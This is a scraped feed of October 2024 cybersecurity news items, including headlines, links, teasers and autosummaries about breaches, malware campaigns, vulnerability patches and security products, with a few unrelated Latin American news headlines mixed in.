        Cyber claims have continued their upward trend over the past year, driven in large part by a rise in data and privacy breach incidents, according to Allianz. Cyber claims frequency exceeds €1 million The frequency of large cyber claims (>€1 million) in the first six months of 2024 was up 14% while severity increased by 17%, according to the insurer’s claims analysis, following just a 1% increase in severity during 2023. Data and privacy breach-related … More


        Autosummary: “In discussions with clients, it is critical we understand their data governance standards and how transparent they are when it comes to their use of consumers’ data, who they share it with, and their approach to vendor cyber security,” says Tresa Stephens, Head of Cyber, North America, Allianz Commercial. “AI is also becoming an essential tool in the fight against cyber-attacks, as it can quickly identify a security breach and automatically isolate systems and databases, as well as having the potential to significantly reduce the cost and life cycle of a data breach claim by automating tasks, such as forensics and notifications, potentially saving companies millions of dollars,” concluded Baviskar.


        WordPress Plugin Jetpack Patches Major Vulnerability Affecting 27 Million Sites

        exploits
        2024-10-15 https://thehackernews.com/2024/10/wordpress-plugin-jetpack-patches-major.html
        The maintainers of the Jetpack WordPress plugin have released a security update to remediate a critical vulnerability that could allow logged-in users to access forms submitted by others on a site. Jetpack, owned by WordPress maker Automattic, is an all-in-one plugin that offers a comprehensive suite of tools to improve site safety, performance, and traffic growth. It’s used on 27 million

        Autosummary: The shortcoming has been addressed in the following 101 different versions of Jetpack: 13.9.1, 13.8.2, 13.7.1, 13.6.1, 13.5.1, 13.4.4, 13.3.2, 13.2.3, 13.1.4, 13.0.1, 12.9.4, 12.8.2, 12.7.2, 12.6.3, 12.5.1, 12.4.1, 12.3.1, 12.2.2, 12.1.2, 12.0.2, 11.9.3, 11.8.6, 11.7.3, 11.6.2, 11.5.3, 11.4.2, 11.3.4, 11.2.2, 11.1.4, 11.0.2, 10.9.3, 10.8.2, 10.7.2, 10.6.2, 10.5.3, 10.4.2, 10.3.2, 10.2.3, 10.1.2, 10.0.2, 9.9.3, 9.8.3, 9.7.3, 9.6.4, 9.5.5, 9.4.4, 9.3.5, 9.2.4, 9.1.3, 9.0.5, 8.9.4, 8.8.5, 8.7.4, 8.6.4, 8.5.3, 8.4.5, 8.3.3, 8.2.6, 8.1.4, 8.0.3, 7.9.4, 7.8.4, 7.7.6, 7.6.4, 7.5.7, 7.4.5, 7.3.5, 7.2.5, 7.1.5, 7.0.5, 6.9.4, 6.8.5, 6.7.4, 6.6.5, 6.5.4, 6.4.6, 6.3.7, 6.2.5, 6.1.5, 6.0.4, 5.9.4, 5.8.4, 5.7.5, 5.6.5, 5.5.5, 5.4.4, 5.3.4, 5.2.5, 5.1.4, 5.0.3, 4.9.3, 4.8.5, 4.7.4, 4.6.3, 4.5.3, 4.4.5, 4.3.5, 4.2.5, 4.1.4, 4.0.7, 3.9.10. While there is no evidence that the vulnerability has ever been exploited in the wild, there is a likelihood that it could be abused going forward in light of public disclosure.


        Researchers Uncover Hijack Loader Malware Using Stolen Code-Signing Certificates

        exploits
        2024-10-15 https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html
        Cybersecurity researchers have disclosed a new malware campaign that delivers Hijack Loader artifacts that are signed with legitimate code-signing certificates. French cybersecurity company HarfangLab, which detected the activity at the start of the month, said the attack chains aim to deploy an information stealer known as Lumma. Hijack Loader, also known as DOILoader, IDAT Loader, and

        Autosummary: HarfangLab said it observed three different versions of the PowerShell script starting mid-September 2024: a PowerShell script that leverages mshta.exe to execute code hosted on a remote server; a remotely-hosted PowerShell script that’s directly executed via the Invoke-Expression cmdlet (aka iex); and a PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL. The ZIP archive, for its part, includes a genuine executable that’s susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that’s to be loaded instead.


        The Rise of Zero-Day Vulnerabilities: Why Traditional Security Solutions Fall Short

        exploits
        2024-10-15 https://thehackernews.com/2024/10/rise-of-zero-day-vulnerabilities.html
        In recent years, the number and sophistication of zero-day vulnerabilities have surged, posing a critical threat to organizations of all sizes. A zero-day vulnerability is a security flaw in software that is unknown to the vendor and remains unpatched at the time of discovery. Attackers exploit these flaws before any defensive measures can be implemented, making zero-days a potent weapon for

        Autosummary: For example, an NDR solution can detect a Command and Control (C2) channel set up by an intruder using a zero-day exploit by leveraging these key capabilities: first, the solution continuously monitors all network traffic, including metadata such as source and destination IPs, connection times and traffic volumes. Why Traditional Solutions Fail: Traditional security solutions such as Security Information and Event Management (SIEM), Intrusion Detection Systems (IDS), and Endpoint Detection and Response (EDR) often struggle against zero-day attacks. If a zero-day exploit is used to infiltrate the network, subsequent C2 communications will often show anomalous behavior such as beaconing, irregular-sized transfers, or specific timing (e.g. "phone home" signals).


        AI scammers target Gmail accounts, say they have your death certificate

        financial
        2024-10-15 https://www.malwarebytes.com/blog/news/2024/10/ai-scammers-target-gmail-accounts-say-they-have-your-death-certificate
        Typical AI supported scams are after your Google account by pretending to follow up on account recovery requests.

        Autosummary: To verify if a security alert is from Google, users can check their Recent security activity: Tap your Gmail profile photo in the top right corner. Tap Manage your Google Account. Select the Security tab. Here you can find the Review Security Activity button. Any messages claiming to be security alerts from Google that are not listed there will not be from Google. "Public service announcement: You should be aware of a pretty elaborate phishing scam using AI voice that claims to be Google Support (caller ID matches, but is not verified). DO NOT CLICK YES ON THIS DIALOG — You will be phished. They claim to be checking that you are alive and…" — Garry Tan (@garrytan), October 10, 2024. The scammers claim to be checking that you are alive and whether they should disregard a filed death certificate.


        Bitdefender Scam Copilot detects and combats online scams

        financial
        2024-10-15 https://www.helpnetsecurity.com/2024/10/15/bitdefender-scam-copilot/

        Bitdefender launched Scam Copilot, an advanced technology platform powered by AI and designed to detect and fight scams along with fraud attempts across devices including computers, tablets, and mobile phones. The platform has been integrated into several Bitdefender digital life protection consumer products adding another powerful layer of defense to protect against malware, credential stealing, and data theft. In a report by the Global Anti-Scam Alliance (GASA), global losses from scams amounted to over one … More


        Autosummary: Key features and benefits include: Full scam and fraud protection – Scam Copilot provides comprehensive protection across digital environments, including web browsing, email (Gmail and Outlook), texting, chat apps (WhatsApp, Facebook Messenger, Telegram, Discord), push notifications, and calendar invites.


        TrickMo Banking Trojan Can Now Capture Android PINs and Unlock Patterns

        financial exploits
        2024-10-15 https://thehackernews.com/2024/10/trickmo-banking-trojan-can-now-capture.html
        New variants of an Android banking trojan called TrickMo have been found to harbor previously undocumented features to steal a device’s unlock pattern or PIN. "This new addition enables the threat actor to operate on the device even while it is locked," Zimperium security researcher Aazim Yaswant said in an analysis published last week. First spotted in the wild in 2019, TrickMo is so named for

        Autosummary: Another notable aspect is the broad targeting of TrickMo, gathering data from applications spanning multiple categories such as banking, enterprise, job and recruitment, e-commerce, trading, social media, streaming and entertainment, VPN, government, education, telecom, and healthcare.


        New Malware Campaign Uses PureCrypter Loader to Deliver DarkVision RAT

        exploits
        2024-10-15 https://thehackernews.com/2024/10/new-malware-campaign-uses-purecrypter.html
        Cybersecurity researchers have disclosed a new malware campaign that leverages a malware loader named PureCrypter to deliver a commodity remote access trojan (RAT) called DarkVision RAT. The activity, observed by Zscaler ThreatLabz in July 2024, involves a multi-stage process to deliver the RAT payload. "DarkVision RAT communicates with its command-and-control (C2) server using a custom network



        New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists

        financial exploits Linux
        2024-10-15 https://thehackernews.com/2024/10/new-linux-variant-of-fastcash-malware.html
        North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign. The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.



        A new Linux variant of FASTCash malware targets financial systems

        financial exploits Linux
        2024-10-15 https://securityaffairs.com/169860/malware/new-linux-variant-fastcash-malware-targets-financial-systems.html
        North Korea-linked actors deploy a new Linux variant of FASTCash malware to target financial systems, researcher HaxRob revealed. The cybersecurity researcher HaxRob analyzed a new variant of the FASTCash “payment switch” malware which targets Linux systems. The variant discovered by the researcher was previously unknown and targets Ubuntu 22.04 LTS distributions. In November 2018, Symantec […]

        Autosummary: In October 2018, the US-CERT released a joint technical alert from the DHS, the FBI, and the Treasury warning about the ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace).


        Pokemon dev Game Freak discloses data breach

        financial
        2024-10-15 https://securityaffairs.com/169817/data-breach/game-freak-data-breach.html
        Pokemon dev Game Freak confirmed that an August cyberattack led to source code leaks and designs for unpublished games online. Game Freak Inc. is a popular Japanese video game developer, founded on April 26, 1989, by Satoshi Tajiri, Ken Sugimori, and Junichi Masuda. It is primarily known as the main developer of the Pokémon video game series. The […]

        Autosummary: In 2020, Nintendo, another co-owner of Pokémon, suffered a data breach, with attackers leaking source code, internal documents, and development tools.


        Bolivian ex-leader’s looming arrest warrant triggers protests

        latam
        2024-10-15 https://www.bbc.com/news/articles/cn5znlzrv97o
        Ex-President Evo Morales is under investigation for alleged statutory rape and human trafficking, which he denies.



        Breaking down the numbers: Q3 2024 cybersecurity funding activity recap

        ciber
        2024-10-14 https://www.helpnetsecurity.com/2024/10/14/cybersecurity-funding-q3-2024/

        We present a list of selected cybersecurity companies that received funding during the third quarter of 2024 (Q3 2024). Apono October | $15.5 million Apono has raised $15.5 million in a Series A funding led by New Era Capital Partners, with participation from Mindset Ventures, Redseed Ventures, Silvertech Ventures, initial seed investors, and more. Chainguard July | $140 million Chainguard has completed a $140 million Series C round of funding led by Redpoint Ventures, Lightspeed … More


        Autosummary: Opnova September | $3.75 million Backed by $3.75 million in pre-seed funding co-led by Faber, ScaleX, and Preface Ventures, Opnova is set to redefine IT operations by addressing the challenges posed by rework—the time spent on repetitive, mundane, yet essential tasks.


        Nation-State Attackers Exploiting Ivanti CSA Flaws for Network Infiltration

        exploits government
        2024-10-14 https://thehackernews.com/2024/10/nation-state-attackers-exploiting.html
        A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) as a zero-day to perform a series of malicious actions. That’s according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the

        Autosummary: "On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer’s network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable."


        Supply Chain Attacks Exploit Entry Points in Python, npm, and Open-Source Ecosystems

        exploits
        2024-10-14 https://thehackernews.com/2024/10/supply-chain-attacks-exploit-entry.html
        Cybersecurity researchers have found that entry points could be abused across multiple programming ecosystems like PyPI, npm, Ruby Gems, NuGet, Dart Pub, and Rust Crates to stage software supply chain attacks. "Attackers can leverage these entry points to execute malicious code when specific commands are run, posing a widespread risk in the open-source landscape," Checkmarx researchers Yehuda

        Autosummary: Some of the widely-used third-party commands that could be potential targets for command-jacking comprise npm, pip, git, kubectl, terraform, gcloud, heroku, and dotnet.


        THN Cybersecurity Recap: Top Threats, Tools and Trends (Oct 7 - Oct 13)

        ciber
        2024-10-14 https://thehackernews.com/2024/10/thn-cybersecurity-recap-top-threats.html
        Hey there, it’s your weekly dose of "what the heck is going on in cybersecurity land" – and trust me, you NEED to be in the loop this time. We’ve got everything from zero-day exploits and AI gone rogue to the FBI playing crypto kingpin – it’s full of stuff they don’t 🤫 want you to know. So let’s jump in before we get FOMO. ⚡ Threat of the Week GoldenJackal Hacks Air-Gapped Systems: Meet

        Autosummary: Gorilla Botnet Launches 300,000 DDoS Attacks Across 100 Countries: A botnet malware family called Gorilla issued over 300,000 attack commands in the month of September 2024 alone, targeting universities, government websites, telecoms, banks, gaming, and gambling sectors. OpenAI Disrupts Malicious Operations: OpenAI said it has disrupted over 20 malicious cyber operations since the start of the year that abused its generative artificial intelligence (AI) chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and vulnerability research. Social Engineering Via Phone Calls: Threat actors have found an effective social engineering vector in phone calls in order to trick users into performing an unintended action, a technique also called telephone-oriented attack delivery (TOAD), callback phishing, and hybrid vishing (a combination of voice and phishing). 📰 Around the Cyber World Microsoft Announces Windows 11 Security Baseline: Microsoft has released the Windows 11, version 24H2 security baseline with added protections to LAN Manager, Kerberos, User Account Control, and Microsoft Defender Antivirus.


        Critical Veeam Vulnerability Exploited to Spread Akira and Fog Ransomware

        exploits ransomware
        2024-10-14 https://thehackernews.com/2024/10/critical-veeam-vulnerability-exploited.html
        Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware. Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware. CVE-2024-40711, rated 9.8 out of 10.0 on the

        Autosummary: The disclosure comes as Palo Alto Networks Unit 42 detailed a successor to INC ransomware named Lynx that has been active since July 2024, targeting organizations in retail, real estate, architecture, financial, and environmental services sectors in the U.S. and U.K. The emergence of Lynx is said to have been spurred by the sale of INC ransomware’s source code on the criminal underground market as early as March 2024, prompting malware authors to repackage the locker and spawn new variants.


        OneSpan strengthens banking security with phishing-resistant authentication

        financial
        2024-10-14 https://www.helpnetsecurity.com/2024/10/14/onespan-vision-fx/

        OneSpan announced an innovation in phishing-resistant transaction security, VISION FX. This new solution combines OneSpan’s patented CRONTO transaction signing with FIDO2 protocols that strengthen protection against phishing and account takeover (ATO) threats, setting a standard for banking security. Merging both technologies into a single authentication solution delivers a secure and user-friendly option on the market for banking customers logging on to execute transactions. Changes in the banking sector associated with new digital initiatives have ushered in … More


        Autosummary: As a pioneer in authentication solutions for digital banking, OneSpan’s wide range of user authentication and digital transaction security solutions help customers safeguard digital accounts, secure financial transactions, and fight cybercrime.


        Rancher Government Solutions introduces Harvester Government

        government
        2024-10-14 https://www.helpnetsecurity.com/2024/10/14/rancher-government-solutions-harvester-government/

        Rancher Government Solutions launched Harvester Government, the first fully compliant, out-of-the-box Hyperconverged Infrastructure (HCI) solution tailored specifically for US Government and Military operations. Designed to meet the strict security standards required for government use cases, Harvester Government offers a pre-hardened HCI infrastructure platform that seamlessly combines compliance, security, and flexibility. Harvester Government is derived from the upstream open-source product but reimagined and enhanced to meet the unique operational and security needs of the US Government. … More


        Autosummary: “By delivering a solution that is compliant and hardened out-of-the-box, we are enabling government entities to deploy modern IT infrastructure quickly, securely, and with confidence.”


        TrickMo malware steals Android PINs using fake lock screen

        exploits
        2024-10-14 https://www.bleepingcomputer.com/news/security/trickmo-malware-steals-android-pins-using-fake-lock-screen/
        Forty new variants of the TrickMo Android banking trojan have been identified in the wild, linked to 16 droppers and 22 distinct command and control (C2) infrastructures, with new features designed to steal Android PINs. [...]

        Autosummary: However, TrickMo’s targeting scope appears broad enough to encompass app types (and accounts) beyond banking, including VPN, streaming platforms, e-commerce platforms, trading, social media, recruitment, and enterprise platforms.


        New FASTCash malware Linux variant helps steal money from ATMs

        financial exploits Linux
        2024-10-14 https://www.bleepingcomputer.com/news/security/new-fastcash-malware-linux-variant-helps-steal-money-from-atms/
        North Korean hackers are using a new Linux variant of the FASTCash malware to infect the payment switch systems of financial institutions and perform unauthorized cash withdrawals. [...]

        Autosummary: Once the manipulated message is sent back to the bank’s central systems containing the approval codes (DE38, DE39) and the amount (DE54), the bank approves the transaction, and a money mule acting on behalf of the hackers withdraws the cash from an ATM.


        Aspiring digital defender? Explore cybersecurity internships, scholarships and apprenticeships

        ciber
        2024-10-14 https://www.welivesecurity.com/en/cybersecurity/aspiring-digital-defender-explore-cybersecurity-internships-scholarships-apprenticeships/
        The world needs more cybersecurity professionals – here are three great ways to give you an ‘in’ to the ever-growing and rewarding security industry.

        Autosummary: Job security: Almost all industries require cybersecurity, including health, government, education, law, financial services, and manufacturing – cybersecurity roles aren’t going anywhere. Although internships are typically unpaid, several major players, including CISA, DoD, DHS and IBM, offer paid opportunities, ensuring that students at all stages of their cyber journey can get a foot in the door without undue financial stress. In a day and age where everything is digital, a data breach or cyberattack can cost any organization dearly, affecting it financially, operationally, legally and reputationally – to the point of possibly jeopardizing its very existence.


        U.S. CISA adds Fortinet products and Ivanti CSA bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-14 https://securityaffairs.com/169804/security/u-s-cisa-adds-fortinet-products-and-ivanti-csa-bugs-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet products and Ivanti CSA bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Last week, Ivanti warned of three new security vulnerabilities (CVE-2024-9379, CVE-2024-9380, and CVE-2024-9381) in its Cloud Service Appliance (CSA) […] "

        Autosummary: Last week, Ivanti warned of three new security vulnerabilities (CVE-2024-9379, CVE-2024-9380, and CVE-2024-9381) in its Cloud Service Appliance (CSA) that are actively exploited in attacks in the wild. "


        Nation-state actor exploited three Ivanti CSA zero-days

        exploits government
        2024-10-14 https://securityaffairs.com/169778/apt/ivanti-cloud-service-appliance-three-zero.html
        An alleged nation-state actor exploited three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) in recent attacks. Fortinet FortiGuard Labs researchers warn that a suspected nation-state actor has been exploiting three Ivanti Cloud Service Appliance (CSA) zero-day issues to carry out malicious activities. The three vulnerabilities exploited by the threat actor are: “an advanced adversary […] "

        Autosummary: Nation-state actor exploited three Ivanti CSA zero-days Pierluigi Paganini October 14, 2024 An alleged nation-state actor exploited three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) in recent attacks. "


        Five beheaded bodies found next to road in Mexico

        latam
        2024-10-14 https://www.bbc.com/news/articles/c148yy7yxyno
        The rural area, which is plagued by violence, is largely under the control of the powerful Jalisco New Generation Cartel. "

        Autosummary: "


        Week in review: Microsoft fixes two exploited zero-days, SOC teams are losing trust in security tools

        exploits
        2024-10-13 https://www.helpnetsecurity.com/2024/10/13/week-in-review-microsoft-fixes-two-exploited-zero-days-soc-teams-are-losing-trust-in-security-tools/

        Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572) For October 2024 Patch Tuesday, Microsoft has released fixes for 117 security vulnerabilities, including two under active exploitation: CVE-2024-43573, a spoofing bug affecting the Windows MSHTML Platform, and CVE-2024-43572, a remote code execution flaw in the Microsoft Management Console (MMC). SOC teams are frustrated with their security tools Security operations … More

        The post Week in review: Microsoft fixes two exploited zero-days, SOC teams are losing trust in security tools appeared first on Help Net Security.

        "

        Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572) For October 2024 Patch Tuesday, Microsoft has released fixes for 117 security vulnerabilities, including two under active exploitation: CVE-2024-43573, a spoofing bug affecting the Windows MSHTML Platform, and CVE-2024-43572, a remote code execution flaw in the Microsoft Management Console (MMC). New infosec products of the week: October 11, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Action1, BreachLock, Commvault, Dashlane, Data Theorem, Edgio, Frontegg, and Qualys. "


        OilRig Exploits Windows Kernel Flaw in Espionage Campaign Targeting UAE and Gulf

        exploits Linux
        2024-10-13 https://thehackernews.com/2024/10/oilrig-exploits-windows-kernel-flaw-in.html
        The Iranian threat actor known as OilRig has been observed exploiting a now-patched privilege escalation flaw impacting the Windows Kernel as part of a cyber espionage campaign targeting the U.A.E. and the broader Gulf region. "The group utilizes sophisticated tactics that include deploying a backdoor that leverages Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities "

        Autosummary: "


        Iranian hackers now exploit Windows flaw to elevate privileges

        exploits
        2024-10-13 https://www.bleepingcomputer.com/news/security/oilrig-hackers-now-exploit-windows-flaw-to-elevate-privileges/
        The Iranian state-sponsored hacking group APT34, aka OilRig, has recently escalated its activities with new campaigns targeting government and critical infrastructure entities in the United Arab Emirates and the Gulf region. [...] "

        Autosummary: In these attacks, spotted by Trend Micro researchers, OilRig deployed a novel backdoor, targeting Microsoft Exchange servers to steal credentials, and also exploited the Windows CVE-2024-30088 flaw to elevate their privileges on compromised devices. "


        Eight dead as violent storms sweep Brazil after worst-ever drought

        latam
        2024-10-13 https://www.bbc.com/news/articles/czj98v31jjdo
        Winds of up to 100km/h (60mph) have brought down trees and power lines. "

        Autosummary: "


        OpenAI confirms threat actors use ChatGPT to write malware

        exploits
        2024-10-12 https://www.bleepingcomputer.com/news/security/openai-confirms-threat-actors-use-chatgpt-to-write-malware/
        OpenAI has disrupted over 20 malicious cyber operations abusing its AI-powered chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and conducting spear-phishing attacks. [...] "

        Autosummary: "This allowed us to see that the command and control server for this malware is a WAMP (Windows, Apache, MySQL & PHP/Perl/Python) setup and during testing was using the domain stickhero[.]pro." All OpenAI accounts used by the above threat actors were banned, and the associated indicators of compromise, including IP addresses, have been shared with cybersecurity partners. OpenAI has disrupted over 20 malicious cyber operations abusing its AI-powered chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and conducting spear-phishing attacks. LLM-aided development: The malware created with the help of OpenAI's chatbot can steal contact lists, call logs, and files stored on the device, take screenshots, scrutinize the user's browsing history, and get their precise position. "


        Scammers target Airbnb and Booking.com users

        financial
        2024-10-11 https://www.helpnetsecurity.com/2024/10/11/telekopye-booking-platforms-scams/

        ESET researchers discovered that the organized scammer network Telekopye has expanded its operations to target users of popular accommodation booking platforms like Booking.com and Airbnb. They have also increased the sophistication of their victim selection and of targeting the two booking sites, where the phishing pages are even more believable than regular online marketplace ones. The Telekopye scammer network Telekopye is a toolkit that operates as a Telegram bot turning online marketplace scams into illicit … More

        The post Scammers target Airbnb and Booking.com users appeared first on Help Net Security.

        "

        Autosummary: In late 2023, after ESET Research had published its two-part series on Telekopye, Czech and Ukrainian police arrested tens of cybercriminals utilizing Telekopye, including the key players, in two joint operations. "


        Ubuntu 24.10 Oracular Oriole brings tighter security controls

        Linux
        2024-10-11 https://www.helpnetsecurity.com/2024/10/11/ubuntu-24-10-oracular-oriole/

        Canonical released Ubuntu 24.10 Oracular Oriole, which brings notable advancements, including an updated kernel, new toolchains, and the GNOME 47 desktop environment, along with significant enhancements in software security. “Oracular Oriole sets a new pace for delivering the latest upstream kernel and toolchains,” said Mark Shuttleworth, CEO of Canonical, “Experimental new security features demonstrate our commitment to continually elevate the Linux desktop experience in conversation with the community for the next 20 years and beyond.” … More

        The post Ubuntu 24.10 Oracular Oriole brings tighter security controls appeared first on Help Net Security.

        "

        Autosummary: Expanded toolchain support with versioned Rust and Java TCK Certification Ubuntu 24.10 brings expanded toolchain support, featuring the latest versions of Python, Java, Go, C, C++, Rust, and .Net, with .Net support now extended to the ppc64el architecture. "


        CISA Warns of Threat Actors Exploiting F5 BIG-IP Cookies for Network Reconnaissance

        exploits
        2024-10-11 https://thehackernews.com/2024/10/cisa-warns-of-threat-actors-exploiting.html
        The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks. It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who "

        Autosummary: Attacks mounted by APT29 have been categorized as those designed to harvest intelligence and establish persistent access so as to facilitate supply chain compromises (i.e., targets of intent), as well as those that allow them to host malicious infrastructure or conduct follow-on operations from compromised accounts by taking advantage of publicly known flaws, weak credentials, or other misconfigurations (i.e., targets of opportunity). "


        New Critical GitLab Vulnerability Could Allow Arbitrary CI/CD Pipeline Execution

        exploits
        2024-10-11 https://thehackernews.com/2024/10/new-critical-gitlab-vulnerability-could.html
        GitLab has released security updates for Community Edition (CE) and Enterprise Edition (EE) to address eight security flaws, including a critical bug that could allow running Continuous Integration and Continuous Delivery (CI/CD) pipelines on arbitrary branches. Tracked as CVE-2024-9164, the vulnerability carries a CVSS score of 9.6 out of 10. "An issue was discovered in GitLab EE "

        Autosummary: "


        Casio confirms customer data stolen in a ransomware attack

        exploits ransomware
        2024-10-11 https://www.bleepingcomputer.com/news/security/casio-confirms-customer-data-stolen-in-a-ransomware-attack/
        Casio now confirms it suffered a ransomware attack earlier this month, warning that the personal and confidential data of employees, job candidates, and some customers was also stolen. [...] "

        Autosummary: "Please refrain from spreading this information through social media, etc., as it could increase the damage caused by the leak of information on this case, violate the privacy of those affected, have serious effects on their lives and businesses, and encourage crime," says the updated Casio statement. "


        GitHub, Telegram Bots, and QR Codes Abused in New Wave of Phishing Attacks

        financial
        2024-10-11 https://thehackernews.com/2024/10/github-telegram-bots-and-qr-codes.html
        A new tax-themed malware campaign targeting insurance and finance sectors has been observed leveraging GitHub links in phishing email messages as a way to bypass security measures and deliver Remcos RAT, indicating that the method is gaining traction among threat actors. "In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were "

        Autosummary: "In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were used instead of unknown, low-star repositories," Cofense researcher Jacob Malimban said. "


        What lies ahead for AI in cybersecurity

        ciber
        2024-10-10 https://www.helpnetsecurity.com/2024/10/10/ai-cybersecurity-potential-video/

        AI is becoming recognized for its potential to strengthen cybersecurity measures and tackle the skills gap across various sectors. Its ability to streamline data management processes boosts efficiency and strengthens security protocols. However, the rise of GenAI has raised alarms about the effectiveness of traditional data privacy practices, urging a reevaluation of existing strategies. Aaron Fulkerson, CEO of Opaque, discusses how the weaponization of GenAI has made existing data privacy practices (like masking, anonymization, tokenization, … More

        The post What lies ahead for AI in cybersecurity appeared first on Help Net Security.

        "

        Autosummary: "


        Firefox Zero-Day Under Attack: Update Your Browser Immediately

        exploits
        2024-10-10 https://thehackernews.com/2024/10/mozilla-warns-of-active-exploitation-in.html
        Mozilla has revealed that a critical security flaw impacting Firefox and Firefox Extended Support Release (ESR) has come under active exploitation in the wild. The vulnerability, tracked as CVE-2024-9680, has been described as a use-after-free bug in the Animation timeline component. "An attacker was able to achieve code execution in the content process by exploiting a use-after-free in "

        Autosummary: "


        Internet Archive data breach, defacement, and DDoS: Users’ data compromised

        financial
        2024-10-10 https://www.helpnetsecurity.com/2024/10/10/internet-archive-data-breach/

        The Internet Archive has suffered a data breach, leading to the compromise of email addresses, screen names and bcrypt password hashes of some 31 million users. The compromise was revealed on Wednesday afternoon, when the digital library’s website began showing a JavaScript pop-up saying: “Have you ever felt like the Internet Archive runs on sticks and is constantly on the verge of suffering a catastrophic security breach? It just happened. See 31 million of you … More

        The post Internet Archive data breach, defacement, and DDoS: Users’ data compromised appeared first on Help Net Security.

        "

        Autosummary: The Internet Archive is a non-profit organization that provides free access to digitized materials – printed and audiovisual materials, music, podcasts, audio books, images, software – as well as the Wayback Machine, a massive collection of archived copies of web pages. "


        Adaptiva improves collaboration between IT and security teams with vulnerability dashboards

        exploits
        2024-10-10 https://www.helpnetsecurity.com/2024/10/10/adaptiva-onesite-patch-vulnerability-dashboards/

        Adaptiva announces the latest feature release for OneSite Patch: vulnerability dashboards. These new dashboards provide real-time visibility into Common Vulnerabilities and Exposures (CVEs) in the environment and patches that can remediate them–empowering organizations to find and fix vulnerabilities efficiently. IT and security teams often struggle to obtain real-time data that unifies vulnerability discovery and remediation status within the IT environment. This includes understanding how many vulnerabilities have available patches and the deployment status of those … More

        The post Adaptiva improves collaboration between IT and security teams with vulnerability dashboards appeared first on Help Net Security.

        "

        Autosummary: Insights with the new vulnerability dashboards include: Detected CVEs CVEs by Threat Recency CVEs by Exploit Maturity CVEs by Exploit Type CVEs by Vulnerability Age Vulnerable Devices In addition to the vulnerability dashboards, OneSite Patch also includes newly updated patching dashboards for more granular reporting. "


        Cybercriminals Use Unicode to Hide Mongolian Skimmer in E-Commerce Platforms

        ciber
        2024-10-10 https://thehackernews.com/2024/10/cybercriminals-use-unicode-to-hide.html
        Cybersecurity researchers have shed light on a new digital skimmer campaign that leverages Unicode obfuscation techniques to conceal a skimmer dubbed Mongolian Skimmer. "At first glance, the thing that stood out was the script's obfuscation, which seemed a bit bizarre because of all the accented characters," Jscrambler researchers said in an analysis. "The heavy use of Unicode characters, many "

        Autosummary: Three days later, the other group responded: "I agree 50/50, you can add your code :)" Then on September 30, the first threat actor replied back, stating "Alright ) so how can I contact you though? "


        Internet Archive suffers data breach and DDoS

        financial
        2024-10-10 https://www.malwarebytes.com/blog/news/2024/10/internet-archive-suffers-data-breach-and-ddos
        The Internet Archive has been hit hard by a data breach and several DDoS attacks all around the same time. "

        Autosummary: The stolen database contains authentication information for registered members, including their email addresses, screen names, password change timestamps, Bcrypt-hashed passwords, and other internal data. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


        Ransomware attack leaks social security numbers of over 230,000 Comcast customers

        exploits
        2024-10-10 https://www.bitdefender.com/en-us/blog/hotforsecurity/ransomware-attack-leaks-social-security-numbers-of-over-230-000-comcast-customers/
        Financial Business and Consumer Solutions (FBCS), a debt collection agency previously used by Comcast, was the subject of a ransomware attack in February 2024, which had a database of names, addresses, social security numbers, dates of birth, and Comcast account details exposed. Read more in my article on the Hot for Security blog. "

        Autosummary: Financial Business and Consumer Solutions (FBCS), a debt collection agency previously used by Comcast, was the subject of a ransomware attack in February 2024, which had a database of names, addresses, social security numbers, dates of birth, and Comcast account details exposed. "


        ESET updates Vulnerability and Patch Management module

        exploits
        2024-10-10 https://www.helpnetsecurity.com/2024/10/10/eset-vulnerability-and-patch-management/

